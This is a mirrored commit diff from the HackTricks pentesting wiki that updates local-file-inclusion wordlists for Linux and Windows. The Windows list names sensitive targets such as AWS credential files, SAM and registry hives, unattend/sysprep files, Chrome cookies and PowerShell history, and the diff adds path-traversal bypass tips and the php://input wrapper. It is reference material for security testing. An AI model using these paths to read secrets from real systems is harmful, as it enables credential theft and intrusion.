Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] 494 pages modified

Browse source
This commit is contained in:
CPol 2021-06-27 16:28:03 +00:00 committed by gitbook-bot
parent 1ea2c25614
commit d31979546b
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 90 additions and 42 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
pentesting-web/file-inclusion/lfi-linux-list.md
View file

@ -1,5 +1,10 @@
# LFI - Linux List
Try also to change `/` for `\`
Try also to add `../../../../../`
If you want to test several depths of folders with some bypasses included you can use the list [https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/traversal.txt](https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/traversal.txt)
```text
/apache/conf/httpd.conf
/apache/php/php.ini

127
pentesting-web/file-inclusion/lfi-windows-list.md
View file

@ -1,5 +1,8 @@
# LFI - Windows List
Try also to change `/` for `\`
Try also to remove `C:/` and add `../../../../../`
```text
C:/$recycle.bin/s-1-5-18/desktop.ini
C:/apache2/log/access.log
@ -19,12 +22,15 @@ C:/apache/logs/access_log
C:/apache/logs/error.log
C:/apache/logs/error_log
C:/apache/php/php.ini
c:/apache/php/php.ini
C:/boot.ini
C:/documents and settings/administrator/desktop/desktop.ini
C:/documents and settings/administrator/ntuser.dat
C:/documents and settings/administrator/ntuser.ini
C:/home2/bin/stable/apache/php.ini
c:/home2/bin/stable/apache/php.ini
C:/home/bin/stable/apache/php.ini
c:/home/bin/stable/apache/php.ini
C:/inetpub/logs/logfiles
C:/inetpub/wwwroot/global.asa
C:/inetpub/wwwroot/index.asp
@ -43,42 +49,32 @@ C:/logs/httpd/access_log
C:/logs/httpd/error_log
C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
C:/mysql/bin/my.ini
C:/MySQL/data/hostname.err
C:/mysql/data/hostname.err
C:/MySQL/data/mysql-bin.log
C:/MySQL/data/mysql.err
C:/mysql/data/mysql.err
C:/MySQL/data/mysql.log
C:/mysql/data/mysql.log
C:/MySQL/my.cnf
C:/mysql/my.cnf
C:/MySQL/my.ini
C:/mysql/my.ini
c:/NetServer/bin/stable/apache/php.ini
C:/opt/xampp/logs/access.log
C:/opt/xampp/logs/access_log
C:/opt/xampp/logs/error.log
C:/opt/xampp/logs/error_log
C:/php4/php.ini
c:/php4/php.ini
C:/php4/sessions/
C:/php5/php.ini
c:/php5/php.ini
C:/php5/sessions/
C:/php/php.ini
c:/PHP/php.ini
c:/php/php.ini
C:/php/sessions/
C:/programdata/mcafee/common framework/sitelist.xml
C:/program files/apache group/apache2/conf/httpd.conf
C:/program files/apache group/apache/conf/access.log
C:/program files/apache group/apache/conf/error.log
C:/program files/apache group/apache/conf/httpd.conf
C:/program files/apache group/apache/logs/access.log
C:/program files/apache group/apache/logs/error.log
C:/program files/filezilla server/filezilla server.xml
C:/program files/mysql/data/hostname.err
C:/program files/mysql/data/mysql-bin.log
C:/program files/mysql/data/mysql.err
C:/program files/mysql/data/mysql.log
C:/program files/mysql/my.cnf
C:/program files/mysql/my.ini
C:/program files/mysql/mysql server 5.0/data/hostname.err
C:/program files/mysql/mysql server 5.0/data/mysql-bin.log
C:/program files/mysql/mysql server 5.0/data/mysql.err
C:/program files/mysql/mysql server 5.0/data/mysql.log
C:/program files/mysql/mysql server 5.0/my.cnf
C:/program files/mysql/mysql server 5.0/my.ini
C:/program files/mysql/mysql server 5.1/my.ini
C:/program files (x86)/apache group/apache2/conf/httpd.conf
C:/program files (x86)/apache group/apache/conf/access.log
C:/program files (x86)/apache group/apache/conf/error.log
@ -100,17 +96,58 @@ C:/program files (x86)/mysql/mysql server 5.0/my.cnf
C:/program files (x86)/mysql/mysql server 5.0/my.ini
C:/program files (x86)/mysql/mysql server 5.1/my.ini
C:/program files (x86)/xampp/apache/conf/httpd.conf
C:/program files/apache group/apache2/conf/httpd.conf
C:/program files/apache group/apache/conf/access.log
C:/program files/apache group/apache/conf/error.log
C:/program files/apache group/apache/conf/httpd.conf
C:/program files/apache group/apache/logs/access.log
C:/program files/apache group/apache/logs/error.log
C:/program files/filezilla server/filezilla server.xml
C:/program files/mysql/data/hostname.err
C:/program files/mysql/data/mysql-bin.log
C:/program files/mysql/data/mysql.err
C:/program files/mysql/data/mysql.log
C:/program files/mysql/my.cnf
C:/program files/mysql/my.ini
C:/program files/mysql/mysql server 5.0/data/hostname.err
C:/program files/mysql/mysql server 5.0/data/mysql-bin.log
C:/program files/mysql/mysql server 5.0/data/mysql.err
C:/program files/mysql/mysql server 5.0/data/mysql.log
C:/program files/mysql/mysql server 5.0/my.cnf
C:/program files/mysql/mysql server 5.0/my.ini
C:/program files/mysql/mysql server 5.1/my.ini
C:/program files/xampp/apache/conf/httpd.conf
C:/programdata/mcafee/common framework/sitelist.xml
C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf
C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf
C:/ProgramFiles/ApacheGroup/Apache/logs/access.log
C:/ProgramFiles/ApacheGroup/Apache/logs/error.log
C:/ProgramFiles/MySQL/data/hostname.err
C:/ProgramFiles/MySQL/data/mysql-bin.log
C:/ProgramFiles/MySQL/data/mysql.err
C:/ProgramFiles/MySQL/data/mysql.log
C:/ProgramFiles/MySQL/my.cnf
C:/ProgramFiles/MySQL/my.ini
C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err
C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log
C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err
C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log
C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf
C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini
C:/ProgramFiles/xampp/apache/conf/httpd.conf
C:/sysprep.inf
C:/sysprep.xml
C:/sysprep/sysprep.inf
C:/sysprep/sysprep.xml
C:/sysprep.xml
C:/system32/inetsrv/metabase.xml
C:/system volume information/wpsettings.dat
C:/unattended.txt
C:/unattended.xml
C:/unattend.txt
C:/unattend.xml
C:/unattended.txt
C:/unattended.xml
C:/users/administrator/.aws/config
C:/users/administrator/.aws/credentials
C:/users/administrator/.elasticbeanstalk/config
C:/users/administrator/appdata/local/google/chrome/user data/default/bookmarks
C:/users/administrator/appdata/local/google/chrome/user data/default/bookmarks.bak
C:/users/administrator/appdata/local/google/chrome/user data/default/cookies
@ -121,11 +158,8 @@ C:/users/administrator/appdata/local/google/chrome/user data/default/preferences
C:/users/administrator/appdata/local/google/chrome/user data/default/secure preferences
C:/users/administrator/appdata/local/google/chrome/user data/default/top sites
C:/users/administrator/appdata/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt
C:/users/administrator/.aws/config
C:/users/administrator/.aws/credentials
C:/users/administrator/desktop/desktop.ini
C:/users/administrator/desktop/proof.txt
C:/users/administrator/.elasticbeanstalk/config
C:/users/administrator/ntuser.dat
C:/users/administrator/ntuser.ini
C:/windows/csc/v2.0.6/pq
@ -141,19 +175,22 @@ C:/windows/panther/setupinfo
C:/windows/panther/setupinfo.bak
C:/windows/panther/sysprep.inf
C:/windows/panther/sysprep.xml
C:/windows/panther/unattended.txt
C:/windows/panther/unattended.xml
C:/windows/panther/unattend.txt
C:/windows/panther/unattend.xml
C:/windows/panther/unattend/setupinfo
C:/windows/panther/unattend/setupinfo.bak
C:/windows/panther/unattend/sysprep.inf
C:/windows/panther/unattend/sysprep.xml
C:/windows/panther/unattend.txt
C:/windows/panther/unattend/unattended.txt
C:/windows/panther/unattend/unattended.xml
C:/windows/panther/unattend/unattend.txt
C:/windows/panther/unattend/unattend.xml
C:/windows/panther/unattend.xml
C:/windows/panther/unattend/unattended.txt
C:/windows/panther/unattend/unattended.xml
C:/windows/panther/unattended.txt
C:/windows/panther/unattended.xml
C:/WINDOWS/php.ini
C:/windows/php.ini
c:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM
C:/windows/repair/sam
C:/windows/repair/security
C:/windows/repair/software
@ -179,25 +216,31 @@ C:/windows/system32/inetsrv/config/schema/aspnet_schema.xml
C:/windows/system32/license.rtf
C:/windows/system32/logfiles/httperr/httperr1.log
C:/windows/system32/sysprep.inf
C:/windows/system32/sysprepsysprep.inf
C:/windows/system32/sysprep.xml
C:/windows/system32/sysprep/sysprep.xml
C:/windows/system32/sysprepsysprep.inf
C:/windows/system32/sysprepsysprep.xml
C:/windows/system32/sysprepunattended.txt
C:/windows/system32/sysprepunattended.xml
C:/windows/system32/sysprepunattend.txt
C:/windows/system32/sysprepunattend.xml
C:/windows/system32/sysprep.xml
C:/windows/system32/unattended.txt
C:/windows/system32/unattended.xml
C:/windows/system32/sysprepunattended.txt
C:/windows/system32/sysprepunattended.xml
C:/windows/system32/unattend.txt
C:/windows/system32/unattend.xml
C:/windows/system32/unattended.txt
C:/windows/system32/unattended.xml
C:/windows/system.ini
C:/WINDOWS/TEMP/
C:/windows/temp/
C:/windows/windowsupdate.log
C:/WINDOWS/win.ini
C:/windows/win.ini
C:/windows/windowsupdate.log
C:/WINNT/php.ini
C:/winnt/php.ini
c:/WINNT/php.ini
C:/WINNT/win.ini
C:/winnt/win.ini
C:/xampp/apache/bin/php.ini
c:/xampp/apache/bin/php.ini
C:/xampp/apache/conf/httpd.conf
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
@ -209,16 +252,16 @@ C:/xampp/mercurymail/logs/access.log
C:/xampp/mercurymail/logs/error.log
C:/xampp/mercurymail/mercury.ini
C:/xampp/mysql/data/mysql.err
C:/xampp/php/php.ini
C:/xampp/phpmyadmin/config.inc
C:/xampp/phpmyadmin/config.inc.php
C:/xampp/phpmyadmin/phpinfo.php
C:/xampp/php/php.ini
C:/xampp/sendmail/sendmail.ini
C:/xampp/sendmail/sendmail.log
C:/xampp/tomcat/conf/tomcat-users.xml
C:/xampp/tomcat/conf/web.xml
C:/xampp/webalizer/webalizer.conf
C:/xampp/webdav/webdav.txt
php://input
```